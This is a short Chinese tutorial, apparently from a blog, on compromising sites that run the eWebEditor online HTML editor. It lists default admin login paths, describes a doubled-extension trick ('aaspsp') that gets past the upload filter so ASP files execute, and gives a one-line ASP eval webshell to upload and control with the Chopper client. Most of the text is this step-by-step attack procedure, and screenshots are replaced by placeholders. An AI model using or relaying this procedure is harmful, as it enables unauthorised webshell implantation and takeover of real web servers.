一大帮水货正在赶来!
eWebEditor是一个基于浏览器的在线HTML编辑器。因为十分的好用而拥有相当多的用户。虽然很老了。但是它也助我们小菜拿了很多的webshell
本地搭建网站进行测试
进入正题
—————————————————————————————————————
1、编辑器默认的后台登陆口:
Editor/admin/asp/upload.asp
Editor/admin_login.asp
ewebeditor/admin_login.asp
admin/Editor/admin_login.asp
admin/ewebeditor/admin_login.asp
2.进入后台之后
找上传的地方
图片.png
注:添加图片类型这里,会出错,如果直接是asp|aspx|cer 上传文件会出错,也不能解析,要上传aaspsp|aspx|cer ,这样就可以解析
添加工具栏——按钮设置——添加或者修改图片
图片.png
上传木马<%eval request("chopper")%>
图片.png
可以访问上传的木马,则可以使用菜刀进行连接。
图片.png
图片.png
网友评论